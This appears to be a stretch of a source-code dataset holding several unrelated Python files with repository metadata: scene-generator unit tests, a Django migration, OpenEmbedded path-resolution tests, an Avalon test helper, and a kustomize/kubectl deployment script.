with open(self._object_path(key), 'wb') as f:
f.write(value)
def __delitem__(self, key):
stored.Object(self, key).delete()
| 30.818182
| 85
| 0.590892
|
27c898a6ba655b69e09c6e6206e0db767a8be15c
| 19,391
|
py
|
Python
|
tests/ile_structural_objects_component_test.py
|
NextCenturyCorporation/mcs-scene-generator
|
e0a6ee778359cadd2de682a5006581b7a6134431
|
[
"Apache-2.0"
] | 4
|
2021-02-04T03:57:52.000Z
|
2022-02-08T18:19:58.000Z
|
tests/ile_structural_objects_component_test.py
|
NextCenturyCorporation/mcs-scene-generator
|
e0a6ee778359cadd2de682a5006581b7a6134431
|
[
"Apache-2.0"
] | 68
|
2021-05-06T08:52:46.000Z
|
2022-03-23T16:46:03.000Z
|
tests/ile_structural_objects_component_test.py
|
NextCenturyCorporation/mcs-scene-generator
|
e0a6ee778359cadd2de682a5006581b7a6134431
|
[
"Apache-2.0"
] | 1
|
2021-02-04T03:21:57.000Z
|
2021-02-04T03:21:57.000Z
|
from typing import List
from machine_common_sense.config_manager import Vector3d
from ideal_learning_env import RandomStructuralObjectsComponent
from ideal_learning_env.numerics import MinMaxFloat, VectorFloatConfig
from ideal_learning_env.structural_objects_component import (
RandomStructuralObjectConfig,
SpecificStructuralObjectsComponent,
StructuralLOccluderConfig,
StructuralPlatformConfig,
StructuralRampConfig,
StructuralWallConfig,
)
def prior_scene():
return {'debug': {}, 'goal': {}, 'performerStart':
{'position':
{'x': 0, 'y': 0, 'z': 0}},
'roomDimensions': {'x': 10, 'y': 3, 'z': 10}}
def test_random_structural_objects_defaults():
component = RandomStructuralObjectsComponent({})
assert component.random_structural_objects is None
scene = component.update_ile_scene(prior_scene())
objs = scene['objects']
assert isinstance(objs, list)
occluders = sum(1 for o in objs if o['id'].startswith('occluder'))
num_objs = len(objs) - occluders / 2
assert 2 <= num_objs <= 4
def test_random_structural_objects_num():
component = RandomStructuralObjectsComponent({
'random_structural_objects': {
'num': 3
}
})
assert component.random_structural_objects.num == 3
assert component.random_structural_objects.type is None
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
# occluders create 2 objects.
occluders = sum(1 for o in objs if o['id'].startswith('occluder'))
assert len(objs) == 3 + occluders / 2
def test_random_structural_objects_min_max():
component = RandomStructuralObjectsComponent({
'random_structural_objects': {
'num': {'min': 1, 'max': 4}
}
})
assert component.random_structural_objects.num.min == 1
assert component.random_structural_objects.num.max == 4
computed = component.get_random_structural_objects()
assert 1 <= computed[0].num <= 4
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
# occluders create 2 objects
occluders = sum(bool(o['id'].startswith('occluder')) for o in objs) / 2
min = 1 + occluders
max = 4 + occluders
assert min <= len(objs) <= max
for obj in objs:
assert obj['structure']
def test_random_structural_objects_walls():
component = RandomStructuralObjectsComponent({
'random_structural_objects': {
'type': 'walls',
'num': 2
}
})
assert isinstance(
component.random_structural_objects,
RandomStructuralObjectConfig)
assert component.random_structural_objects.num == 2
assert component.random_structural_objects.type == 'walls'
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
assert len(objs) == 2
for obj in objs:
assert obj['structure']
assert obj['id'].startswith('wall')
def test_random_structural_objects_platforms():
component = RandomStructuralObjectsComponent({
'random_structural_objects': {
'type': 'platforms',
'num': {
'min': 1,
'max': 3
}
}
})
assert isinstance(
component.random_structural_objects,
RandomStructuralObjectConfig)
assert component.random_structural_objects.num.min == 1
assert component.random_structural_objects.num.max == 3
assert component.random_structural_objects.type == 'platforms'
computed = component.get_random_structural_objects()
assert isinstance(computed, List)
assert computed[0].type == 'platforms'
assert 1 <= computed[0].num <= 3
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
assert 1 <= len(objs) <= 3
for obj in objs:
assert obj['structure']
assert obj['id'].startswith('platform')
def test_random_structural_objects_ramps():
component = RandomStructuralObjectsComponent({
'random_structural_objects': {
'type': 'ramps',
'num': [0, 1, 2]
}
})
assert isinstance(
component.random_structural_objects,
RandomStructuralObjectConfig)
assert component.random_structural_objects.type == 'ramps'
assert component.random_structural_objects.num == [0, 1, 2]
computed = component.get_random_structural_objects()
assert isinstance(computed, List)
assert computed[0].type == 'ramps'
assert computed[0].num in [0, 1, 2]
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
assert len(objs) in [0, 1, 2]
for obj in objs:
assert obj['structure']
assert obj['id'].startswith('ramp')
def test_random_structural_objects_l_occluders():
component = RandomStructuralObjectsComponent({
'random_structural_objects': {
'type': 'l_occluders',
'num': 2
}
})
assert isinstance(
component.random_structural_objects,
RandomStructuralObjectConfig)
assert component.random_structural_objects.type == 'l_occluders'
assert component.random_structural_objects.num == 2
computed = component.get_random_structural_objects()
assert isinstance(computed, List)
assert computed[0].type == 'l_occluders'
assert computed[0].num == 2
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
# occluders create 2 objects each
assert len(objs) == 4
for obj in objs:
assert obj['structure']
assert obj['id'].startswith('occluder')
def test_random_structural_objects_all():
# This is minimized for all to avoid rare failures due to big objects
# coming early and causing the test to fail.
component = RandomStructuralObjectsComponent({
'random_structural_objects': [{
'type': 'walls',
'num': {'min': 1, 'max': 1}
}, {
'type': 'platforms',
'num': 1
}, {
'type': 'ramps',
'num': 1
}, {
'type': 'l_occluders',
'num': 1
}]
})
assert isinstance(
component.random_structural_objects, List)
assert component.random_structural_objects[0].num.min == 1
assert component.random_structural_objects[0].num.max == 1
assert component.random_structural_objects[0].type == "walls"
assert component.random_structural_objects[1].num == 1
assert component.random_structural_objects[1].type == "platforms"
assert component.random_structural_objects[2].num == 1
assert component.random_structural_objects[2].type == "ramps"
assert component.random_structural_objects[3].num == 1
assert component.random_structural_objects[3].type == "l_occluders"
computed = component.get_random_structural_objects()
assert isinstance(computed, List)
assert computed[0].type == "walls"
assert computed[0].num == 1
assert computed[1].type == "platforms"
assert computed[1].num == 1
assert computed[2].type == "ramps"
assert computed[2].num == 1
assert computed[3].type == "l_occluders"
assert computed[3].num == 1
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
# occluders create 2 objects each
assert len(objs) == 5
wall = 0
plat = 0
ramp = 0
occ = 0
for obj in objs:
assert obj['structure']
if obj['id'].startswith('wall'):
wall += 1
if obj['id'].startswith('platform'):
plat += 1
if obj['id'].startswith('ramp'):
ramp += 1
if obj['id'].startswith('occluder'):
occ += 1
occ /= 2
assert wall == 1
assert plat == 1
assert ramp == 1
assert occ == 1
def test_structural_objects_defaults():
component = SpecificStructuralObjectsComponent({})
assert component.structural_walls is None
assert component.structural_platforms is None
assert component.structural_l_occluders is None
assert component.structural_ramps is None
scene = component.update_ile_scene(prior_scene())
objs = scene['objects']
assert isinstance(objs, list)
assert len(objs) == 0
def test_structural_objects_walls_full():
my_mats = [
"PLASTIC_MATERIALS",
"AI2-THOR/Materials/Metals/Brass 1"
]
component = SpecificStructuralObjectsComponent({
'structural_walls': {
'num': 1,
'position': {
'x': 1,
'y': 2,
'z': 3
},
'rotation_y': 30,
'material': my_mats,
'width': 1,
'height': 1
}
})
pre_walls = component.structural_walls
assert isinstance(pre_walls, StructuralWallConfig)
assert pre_walls.num == 1
assert isinstance(pre_walls.position, VectorFloatConfig)
assert pre_walls.position.x == 1
assert pre_walls.position.z == 3
assert pre_walls.rotation_y == 30
assert pre_walls.material == my_mats
assert pre_walls.width == 1
assert pre_walls.height == 1
# computed walls
cwalls = component.get_structural_walls()
assert isinstance(cwalls, StructuralWallConfig)
assert cwalls.num == 1
assert isinstance(cwalls.position, Vector3d)
assert cwalls.position.x == 1
assert cwalls.position.z == 3
assert cwalls.rotation_y == 30
assert isinstance(cwalls.material, str)
assert cwalls.material in my_mats
assert cwalls.width == 1
assert cwalls.height == 1
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
# occluders create 2 objects.
assert len(objs) == 1
obj = objs[0]
assert obj['structure']
show = obj['shows'][0]
pos = show['position']
rot = show['rotation']
assert pos['x'] == 1
assert pos['z'] == 3
assert rot['y'] == 30
def test_structural_objects_walls_empty():
component = SpecificStructuralObjectsComponent({
'structural_walls': {
'num': 1
}
})
pre_walls = component.structural_walls
assert isinstance(pre_walls, StructuralWallConfig)
assert pre_walls.num == 1
assert pre_walls.position is None
assert pre_walls.material is None
assert pre_walls.material is None
assert pre_walls.width is None
assert pre_walls.height is None
# computed walls
cwalls = component.get_structural_walls()
assert isinstance(cwalls, StructuralWallConfig)
assert cwalls.num == 1
assert cwalls.position is None
assert cwalls.material is None
assert cwalls.width is None
assert cwalls.height is None
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
# occluders create 2 objects.
assert len(objs) == 1
obj = objs[0]
show = obj['shows'][0]
pos = show['position']
rot = show['rotation']
assert isinstance(pos, dict)
assert isinstance(rot, dict)
assert isinstance(obj['materials'], list)
assert isinstance(pos['x'], float)
assert isinstance(pos['z'], float)
assert isinstance(rot['y'], int)
def test_structural_objects_platforms_full():
my_mats = [
"PLASTIC_MATERIALS",
"AI2-THOR/Materials/Metals/Brass 1"
]
component = SpecificStructuralObjectsComponent({
'structural_platforms': {
'num': 1,
'position': {
'x': 1,
'y': 2,
'z': 3
},
'rotation_y': 30,
'material': my_mats,
'scale': {
'x': 0.4,
'y': 0.5,
'z': 0.6
}
}
})
pre_plat = component.structural_platforms
assert isinstance(pre_plat, StructuralPlatformConfig)
assert pre_plat.num == 1
assert isinstance(pre_plat.position, VectorFloatConfig)
assert pre_plat.position.x == 1
assert pre_plat.position.z == 3
assert pre_plat.rotation_y == 30
assert pre_plat.material == my_mats
scale = pre_plat.scale
assert isinstance(scale, VectorFloatConfig)
assert scale.x == .4
assert scale.y == .5
assert scale.z == .6
# computed walls
cplat = component.get_structural_platforms()
assert isinstance(cplat, StructuralPlatformConfig)
assert cplat.num == 1
assert isinstance(cplat.position, Vector3d)
assert cplat.position.x == 1
assert cplat.position.z == 3
assert cplat.rotation_y == 30
assert isinstance(cplat.material, str)
assert cplat.material in my_mats
scale = cplat.scale
assert isinstance(scale, Vector3d)
assert scale.x == .4
assert scale.y == .5
assert scale.z == .6
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
# occluders create 2 objects.
assert len(objs) == 1
obj = objs[0]
assert obj['structure']
show = obj['shows'][0]
pos = show['position']
rot = show['rotation']
assert pos['x'] == 1
assert pos['z'] == 3
assert rot['y'] == 30
def test_structural_objects_platforms_variables():
my_mats = [
"PLASTIC_MATERIALS",
"AI2-THOR/Materials/Metals/Brass 1"
]
component = SpecificStructuralObjectsComponent({
'structural_platforms': {
'num': 1,
'position': {
'x': {
'min': -4,
'max': 4
},
'y': 2,
'z': [-3, 0, 3]
},
'rotation_y': 30,
'material': my_mats,
'scale': {
'min': 0.2,
'max': 1.5
}
}
})
pre_plat = component.structural_platforms
assert isinstance(pre_plat, StructuralPlatformConfig)
assert pre_plat.num == 1
assert isinstance(pre_plat.position, VectorFloatConfig)
assert pre_plat.position.x == MinMaxFloat(min=-4, max=4)
assert pre_plat.position.z == [-3, 0, 3]
assert pre_plat.rotation_y == 30
assert pre_plat.material == my_mats
scale = pre_plat.scale
assert scale == MinMaxFloat(min=0.2, max=1.5)
# computed walls
cplat = component.get_structural_platforms()
assert isinstance(cplat, StructuralPlatformConfig)
assert cplat.num == 1
assert isinstance(cplat.position, Vector3d)
assert -4 <= cplat.position.x <= 4
assert cplat.position.z in [-3, 0, 3]
assert cplat.rotation_y == 30
assert isinstance(cplat.material, str)
assert cplat.material in my_mats
scale = cplat.scale
assert 0.2 <= scale <= 1.5
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
# occluders create 2 objects.
assert len(objs) == 1
obj = objs[0]
assert obj['structure']
show = obj['shows'][0]
rot = show['rotation']
scale = show['scale']
assert rot['y'] == 30
assert 0.2 <= scale['x'] <= 1.5
assert 0.2 <= scale['y'] <= 1.5
assert 0.2 <= scale['z'] <= 1.5
def test_structural_objects_l_occluders_full():
my_mats = [
"PLASTIC_MATERIALS",
"AI2-THOR/Materials/Metals/Brass 1"
]
component = SpecificStructuralObjectsComponent({
'structural_l_occluders': {
'num': 1,
'position': {
'x': 1,
'y': 2,
'z': 3
},
'rotation_y': 30,
'material': my_mats,
'scale_front_x': 0.3,
'scale_front_z': 0.4,
'scale_side_x': 0.5,
'scale_side_z': 0.6,
'scale_y': 0.7
}
})
pre_occ = component.structural_l_occluders
assert isinstance(pre_occ, StructuralLOccluderConfig)
assert pre_occ.num == 1
assert isinstance(pre_occ.position, VectorFloatConfig)
assert pre_occ.position.x == 1
assert pre_occ.position.z == 3
assert pre_occ.rotation_y == 30
assert pre_occ.material == my_mats
assert pre_occ.scale_front_x == .3
assert pre_occ.scale_front_z == .4
assert pre_occ.scale_side_x == .5
assert pre_occ.scale_side_z == .6
assert pre_occ.scale_y == .7
# computed occluder
comp_occ = component.get_structural_l_occluders()
assert isinstance(comp_occ, StructuralLOccluderConfig)
assert comp_occ.num == 1
assert isinstance(comp_occ.position, Vector3d)
assert comp_occ.position.x == 1
assert comp_occ.position.z == 3
assert comp_occ.rotation_y == 30
assert isinstance(comp_occ.material, str)
assert comp_occ.material in my_mats
assert comp_occ.scale_front_x == .3
assert comp_occ.scale_front_z == .4
assert comp_occ.scale_side_x == .5
assert comp_occ.scale_side_z == .6
assert comp_occ.scale_y == .7
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
# occluders create 2 objects.
assert len(objs) == 2
for obj in objs:
assert obj['structure']
show = obj['shows'][0]
rot = show['rotation']
assert rot['y'] == 30
def test_structural_objects_ramps_full():
my_mats = [
"PLASTIC_MATERIALS",
"AI2-THOR/Materials/Metals/Brass 1"
]
component = SpecificStructuralObjectsComponent({
'structural_ramps': {
'num': 1,
'position': {
'x': 1,
'y': 2,
'z': 3
},
'rotation_y': 30,
'material': my_mats,
'angle': 30,
'width': 0.4,
'length': 0.5
}
})
pre_ramp = component.structural_ramps
assert isinstance(pre_ramp, StructuralRampConfig)
assert pre_ramp.num == 1
assert isinstance(pre_ramp.position, VectorFloatConfig)
assert pre_ramp.position.x == 1
assert pre_ramp.position.z == 3
assert pre_ramp.rotation_y == 30
assert pre_ramp.material == my_mats
assert pre_ramp.angle == 30
assert pre_ramp.width == .4
assert pre_ramp.length == .5
# computed ramps
cramp = component.get_structural_ramps()
assert isinstance(cramp, StructuralRampConfig)
assert cramp.num == 1
assert isinstance(cramp.position, Vector3d)
assert cramp.position.x == 1
assert cramp.position.z == 3
assert cramp.rotation_y == 30
assert isinstance(cramp.material, str)
assert cramp.material in my_mats
assert cramp.angle == 30
assert cramp.width == .4
assert cramp.length == .5
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
# occluders create 2 objects.
assert len(objs) == 1
obj = objs[0]
assert obj['structure']
show = obj['shows'][0]
pos = show['position']
rot = show['rotation']
assert pos['x'] == 1
assert pos['z'] == 3
assert rot['y'] == 30
| 31.225443
| 75
| 0.627972
|
300aab92ae8a2974060e5356ec5d2e2e0b92bb38
| 1,318
|
py
|
Python
|
django/api/migrations/0003_vindecodedinformation.py
|
emi-hi/cthub
|
6e1da9d4e0d0b6037177854de9bb5df1746c848d
|
[
"Apache-2.0"
] | 1
|
2021-12-05T22:11:20.000Z
|
2021-12-05T22:11:20.000Z
|
django/api/migrations/0003_vindecodedinformation.py
|
emi-hi/cthub
|
6e1da9d4e0d0b6037177854de9bb5df1746c848d
|
[
"Apache-2.0"
] | 5
|
2021-09-24T16:54:38.000Z
|
2022-01-22T22:08:38.000Z
|
django/api/migrations/0003_vindecodedinformation.py
|
emi-hi/cthub
|
6e1da9d4e0d0b6037177854de9bb5df1746c848d
|
[
"Apache-2.0"
] | 2
|
2021-10-19T17:26:34.000Z
|
2021-12-05T22:12:56.000Z
|
# Generated by Django 3.1.6 on 2021-11-15 19:20
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0002_ldvrebates'),
]
operations = [
migrations.CreateModel(
name='VINDecodedInformation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_timestamp', models.DateTimeField(auto_now_add=True, null=True)),
('create_user', models.CharField(default='SYSTEM', max_length=130)),
('update_timestamp', models.DateTimeField(auto_now=True, null=True)),
('update_user', models.CharField(max_length=130, null=True)),
('manufacturer', models.CharField(blank=True, max_length=500, null=True)),
('make', models.CharField(blank=True, max_length=250, null=True)),
('model', models.CharField(blank=True, max_length=250, null=True)),
('model_year', models.IntegerField(blank=True, null=True)),
('fuel_type_primary', models.CharField(blank=True, max_length=250, null=True)),
],
options={
'db_table': 'vin_decoded_information',
},
),
]
| 41.1875
| 114
| 0.594082
|
2ee9db30af2627889b67adc650b16c5bd685390d
| 23
|
py
|
Python
|
dataview/__init__.py
|
srkama/haysolr
|
0195f5fc113e416a4cabf3f5ceb1ba55901e4aaa
|
[
"Apache-2.0"
] | null | null | null |
dataview/__init__.py
|
srkama/haysolr
|
0195f5fc113e416a4cabf3f5ceb1ba55901e4aaa
|
[
"Apache-2.0"
] | null | null | null |
dataview/__init__.py
|
srkama/haysolr
|
0195f5fc113e416a4cabf3f5ceb1ba55901e4aaa
|
[
"Apache-2.0"
] | null | null | null |
__author__ = 'Kamal.S'
| 11.5
| 22
| 0.695652
|
e0eb8134a903c1d15547fc9ccf8fa66a7d8eeb28
| 3,312
|
py
|
Python
|
layers/poky/meta/lib/oeqa/selftest/cases/oelib/path.py
|
dtischler/px30-test
|
55dce0b7aff1c4a7dea3ac94f94cc9c67fba7c9f
|
[
"Apache-2.0"
] | 1
|
2020-09-10T02:47:54.000Z
|
2020-09-10T02:47:54.000Z
|
layers/poky/meta/lib/oeqa/selftest/cases/oelib/path.py
|
dtischler/px30-test
|
55dce0b7aff1c4a7dea3ac94f94cc9c67fba7c9f
|
[
"Apache-2.0"
] | 3
|
2019-11-20T02:53:01.000Z
|
2019-12-26T03:00:15.000Z
|
layers/poky/meta/lib/oeqa/selftest/cases/oelib/path.py
|
dtischler/px30-test
|
55dce0b7aff1c4a7dea3ac94f94cc9c67fba7c9f
|
[
"Apache-2.0"
] | null | null | null |
from unittest.case import TestCase
import oe, oe.path
import tempfile
import os
import errno
import shutil
class TestRealPath(TestCase):
DIRS = [ "a", "b", "etc", "sbin", "usr", "usr/bin", "usr/binX", "usr/sbin", "usr/include", "usr/include/gdbm" ]
FILES = [ "etc/passwd", "b/file" ]
LINKS = [
( "bin", "/usr/bin", "/usr/bin" ),
( "binX", "usr/binX", "/usr/binX" ),
( "c", "broken", "/broken" ),
( "etc/passwd-1", "passwd", "/etc/passwd" ),
( "etc/passwd-2", "passwd-1", "/etc/passwd" ),
( "etc/passwd-3", "/etc/passwd-1", "/etc/passwd" ),
( "etc/shadow-1", "/etc/shadow", "/etc/shadow" ),
( "etc/shadow-2", "/etc/shadow-1", "/etc/shadow" ),
( "prog-A", "bin/prog-A", "/usr/bin/prog-A" ),
( "prog-B", "/bin/prog-B", "/usr/bin/prog-B" ),
( "usr/bin/prog-C", "../../sbin/prog-C", "/sbin/prog-C" ),
( "usr/bin/prog-D", "/sbin/prog-D", "/sbin/prog-D" ),
( "usr/binX/prog-E", "../sbin/prog-E", None ),
( "usr/bin/prog-F", "../../../sbin/prog-F", "/sbin/prog-F" ),
( "loop", "a/loop", None ),
( "a/loop", "../loop", None ),
( "b/test", "file/foo", "/b/file/foo" ),
]
LINKS_PHYS = [
( "./", "/", "" ),
( "binX/prog-E", "/usr/sbin/prog-E", "/sbin/prog-E" ),
]
EXCEPTIONS = [
( "loop", errno.ELOOP ),
( "b/test", errno.ENOENT ),
]
def setUp(self):
self.tmpdir = tempfile.mkdtemp(prefix = "oe-test_path")
self.root = os.path.join(self.tmpdir, "R")
os.mkdir(os.path.join(self.tmpdir, "_real"))
os.symlink("_real", self.root)
for d in self.DIRS:
os.mkdir(os.path.join(self.root, d))
for f in self.FILES:
open(os.path.join(self.root, f), "w")
for l in self.LINKS:
os.symlink(l[1], os.path.join(self.root, l[0]))
def tearDown(self):
shutil.rmtree(self.tmpdir)
def __realpath(self, file, use_physdir, assume_dir = True):
return oe.path.realpath(os.path.join(self.root, file), self.root,
use_physdir, assume_dir = assume_dir)
def test_norm(self):
for l in self.LINKS:
if l[2] == None:
continue
target_p = self.__realpath(l[0], True)
target_l = self.__realpath(l[0], False)
if l[2] != False:
self.assertEqual(target_p, target_l)
self.assertEqual(l[2], target_p[len(self.root):])
def test_phys(self):
for l in self.LINKS_PHYS:
target_p = self.__realpath(l[0], True)
target_l = self.__realpath(l[0], False)
self.assertEqual(l[1], target_p[len(self.root):])
self.assertEqual(l[2], target_l[len(self.root):])
def test_loop(self):
for e in self.EXCEPTIONS:
self.assertRaisesRegex(OSError, r'\[Errno %u\]' % e[1],
self.__realpath, e[0], False, False)
| 38.511628
| 115
| 0.46407
|
f3085e09e1f88e6c5aa48fd2a714a6fbd88c42ac
| 3,953
|
py
|
Python
|
tests/automation_framework/src/libs/test_base.py
|
shresthichauhan/trusted-compute-framework
|
1ad89fa6fa4492f43bb79e1c9be3536c4f0ff7f7
|
[
"Apache-2.0"
] | null | null | null |
tests/automation_framework/src/libs/test_base.py
|
shresthichauhan/trusted-compute-framework
|
1ad89fa6fa4492f43bb79e1c9be3536c4f0ff7f7
|
[
"Apache-2.0"
] | null | null | null |
tests/automation_framework/src/libs/test_base.py
|
shresthichauhan/trusted-compute-framework
|
1ad89fa6fa4492f43bb79e1c9be3536c4f0ff7f7
|
[
"Apache-2.0"
] | null | null | null |
from src.libs.avalon_test_wrapper \
import build_request_obj, read_json, submit_request, \
pre_test_env
import logging
import globals
from src.libs.direct_listener import ListenerImpl
from src.libs.direct_sdk import SDKImpl
from src.libs import constants
logger = logging.getLogger(__name__)
class TestBase():
def __init__(self):
self.uri_client = globals.uri_client
self.build_request_output = {}
def setup_and_build_request_lookup(self, input_file):
pre_test_output = pre_test_env(input_file)
request_obj, action_obj = build_request_obj(input_file)
self.build_request_output.update({'request_obj': request_obj})
return 0
def setup_and_build_request_wo_submit(self, input_file):
pre_test_output = pre_test_env(input_file)
request_obj, action_obj = build_request_obj(
input_file, pre_test_output=pre_test_output)
self.build_request_output.update(
{'request_obj': request_obj,
'pre_test_output': pre_test_output,
'action_obj': action_obj})
return 0
def setup_and_build_request_retrieve(self, input_file):
pre_test_output = pre_test_env(input_file)
request_obj, action_obj = build_request_obj(
input_file, pre_test_response=pre_test_output)
self.build_request_output.update(
{'request_obj': request_obj,
'pre_test_output': pre_test_output,
'action_obj': action_obj})
return 0
def setup_and_build_request_receipt(self, input_file):
pre_test_output, wo_submit = pre_test_env(input_file)
request_obj, action_obj = build_request_obj(
input_file, pre_test_output=pre_test_output,
pre_test_response=wo_submit)
self.build_request_output.update(
{'request_obj': request_obj,
'pre_test_output': pre_test_output,
'action_obj': action_obj})
return 0
def setup_and_build_request_receipt_retrieve(self, input_file):
pre_test_output, wo_submit = pre_test_env(input_file)
logger.info("***Pre test output*****\n%s\n", pre_test_output)
logger.info("***wo_submit*****\n%s\n", wo_submit)
# submit_request = json.loads(wo_submit)
result_response = self.getresult(wo_submit)
request_obj, action_obj = build_request_obj(
input_file, pre_test_output=pre_test_output,
pre_test_response=wo_submit)
self.build_request_output.update(
{'request_obj': request_obj,
'pre_test_output': pre_test_output,
'action_obj': action_obj})
return 0
def teardown(self):
logger.info("**No Teardown Defined**\n%s\n")
def setup_and_build_request_worker_update(self, input_file):
pre_test_output = pre_test_env(input_file)
request_obj, action_obj = build_request_obj(
input_file, pre_test_response=pre_test_output)
self.build_request_output.update(
{'request_obj': request_obj,
'pre_test_output': pre_test_output,
'action_obj': action_obj})
return 0
def setup_and_build_request_worker_status(self, input_file):
pre_test_output = pre_test_env(input_file)
request_obj, action_obj = build_request_obj(
input_file, pre_test_response=pre_test_output)
self.build_request_output.update(
{'request_obj': request_obj,
'pre_test_output': pre_test_output,
'action_obj': action_obj})
return 0
def getresult(self, output_obj):
if constants.direct_test_mode == "listener":
listener_instance = ListenerImpl()
response = listener_instance.work_order_get_result(output_obj)
else:
sdk_instance = SDKImpl()
response = sdk_instance.work_order_get_result(output_obj)
return response
| 38.009615
| 74
| 0.676448
|
baddc62992d36e34d77f32baa80ce4dd7555d0e0
| 11,407
|
py
|
Python
|
deployment/deploy-env.py
|
edoburu/demo.django-fluent.org
|
10556eb383849fb20b8c6958d87c4b9f94085af2
|
[
"CC-BY-3.0"
] | 24
|
2016-09-09T02:54:18.000Z
|
2021-02-28T05:35:01.000Z
|
deployment/deploy-env.py
|
edoburu/demo.django-fluent.org
|
10556eb383849fb20b8c6958d87c4b9f94085af2
|
[
"CC-BY-3.0"
] | 288
|
2017-04-13T16:00:23.000Z
|
2022-01-06T13:48:02.000Z
|
deployment/deploy-env.py
|
edoburu/demo.django-fluent.org
|
10556eb383849fb20b8c6958d87c4b9f94085af2
|
[
"CC-BY-3.0"
] | 5
|
2017-03-20T10:37:59.000Z
|
2020-07-28T15:44:08.000Z
|
#!/usr/bin/env python3
import atexit
import json
import os
import sys
from http.client import HTTPResponse
from tempfile import TemporaryDirectory
from ssl import SSLError
from typing import cast
from urllib.error import HTTPError
from urllib.request import urlopen, Request
from time import sleep
import argparse
import subprocess
from configparser import ConfigParser
# Brief implementation (based on termcolor / django's supports_color())
has_colors = hasattr(sys.stdout, "isatty") and sys.stdout.isatty()
GREEN = "\033[32m" if has_colors else ""
RESET = "\033[0m" if has_colors else ""
STATUS_RESOURCES = (
"pods",
"jobs",
"services",
"deployments",
"persistentvolumeclaims",
"configmaps",
"secrets",
"ingress",
)
def main():
os.chdir(os.path.dirname(__file__))
config = ConfigParser()
config.read("deploy-env.ini")
parser = argparse.ArgumentParser(
description="" "Deploy to a Kubernetes cluster using kustomize.\n",
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument(
"environment",
metavar="environment",
choices=config.sections(),
help="Environment name, as section in deploy-env.ini",
)
parser.add_argument(
"--dry-run", action="store_true", help="Output what would be deployed"
)
parser.add_argument(
"--server-dry-run",
action="store_true",
help="Only check whether the server would accept the YAML",
)
parser.add_argument(
"images",
metavar="image",
nargs="*",
help="Image substitution to deploy (format: name=registry/name:tag)",
)
parser.add_argument(
"--wait-for",
help="Text to expect at the healthcheck endpoint to detect a successful deployment.",
)
args = parser.parse_args()
# Read the INI file, start deployment
settings = config[args.environment]
try:
start_deployment(
settings,
images=args.images,
dry_run=args.dry_run,
server_dry_run=args.server_dry_run,
wait_for=args.wait_for,
)
except subprocess.CalledProcessError as e:
print(str(e), file=sys.stderr)
exit(e.returncode)
def start_deployment(
settings, images=None, dry_run=False, server_dry_run=False, wait_for=None
):
"""Perform the complete deployment"""
try:
release_name = settings["name"]
namespace = settings["namespace"]
label_selector = settings["labels"]
kustomize = settings["kustomize"]
healthcheck = settings["healthcheck"]
job = settings.get("job")
except KeyError:
print("Missing settings in INI file!", file=sys.stderr)
exit(1)
return # for pycharm
# Set the image
if images:
kustomize = _create_tmp_customize(
bases=[kustomize], prefix=kustomize.replace(os.path.sep, "-") + "-"
)
subprocess.run(
["kustomize", "edit", "set", "image"] + images, cwd=kustomize, check=True
)
# Generate the yaml contents. As this is reused several times,
# there is no need to setup pipes with subprocess.Popen
yaml_data = subprocess.run(
["kustomize", "build", kustomize, "--reorder", "none"],
stdout=subprocess.PIPE,
check=True,
).stdout
if dry_run:
print(yaml_data.decode())
if not server_dry_run:
return
# Remove old job
if job:
print(green("Removing old job {} from {}:".format(job, namespace)), flush=True)
delete_resources(namespace, 'job', job)
print("")
# Validate the kustomize output against the API server
# This checks whether the deployment would break (e.g. due to immutable fields)
print(green("Validating yaml with server-dry-run:"), flush=True)
subprocess.run(
["kubectl", "apply", "-f", "-", "--server-dry-run"], input=yaml_data, check=True
)
print("")
# Fetch previous configuration that we applied to the server.
# old_yaml_data = get_previous_release(yaml_data)
# Apply new yaml config
# The "kustomize build | kubectl apply -f -" approach allows to use kustomize 2.1,
# where as "kubectl apply --kustomize" uses kustomize 2.0 in kubectl 1.14.
print(green("Deploying {} to {}:".format(release_name, namespace)), flush=True)
subprocess.run(
["kubectl", "apply", "-f", "-", "--namespace", namespace, "--record"],
input=yaml_data,
check=True,
)
if server_dry_run:
return
# Show progress
sleep(1)
print("")
print(green("Objects created in {}:".format(namespace)), flush=True)
show_kube_resources(namespace, label_selector=label_selector)
# Wait for the deployment to come up. There are many reasons why a deployment fails:
# - ingress config invalid
# - service config invalid
# - missing priorityclasses, secrets, etc..
# - image pull issues
# - crashing containers due to wrong db credentials or resource limits.
#
# These can't be all accounted for, but testing for a healthcheck to return
# the latest git hash is a pretty close to catch all of these.
try:
wait_until_healthy(
healthcheck, release_name=release_name, expected_data=wait_for
)
except KeyboardInterrupt:
print("Aborted")
exit(1)
except OSError as e:
print("Deployment failed: {e}".format(e=e))
exit(1)
# if old_yaml_data:
# perform_rollback(old_yaml_data)
# print("Performing rollback")
# subprocess.run(
# ["kubectl", "apply", "-f", "-"],
# input=old_yaml_data,
# check=True,
# )
def delete_resources(namespace, *objects):
"""Delete a job"""
subprocess.run(
[
"kubectl",
"delete",
"job",
"--namespace",
namespace,
"--ignore-not-found",
"--wait=false",
"--now",
*objects,
],
check=True,
)
def purge_deployment(namespace, label_selector):
"""Delete all resources matching a label selector"""
delete_resources(namespace, '--selector', label_selector)
def show_kube_resources(namespace, label_selector):
"""Output the status of various objects.."""
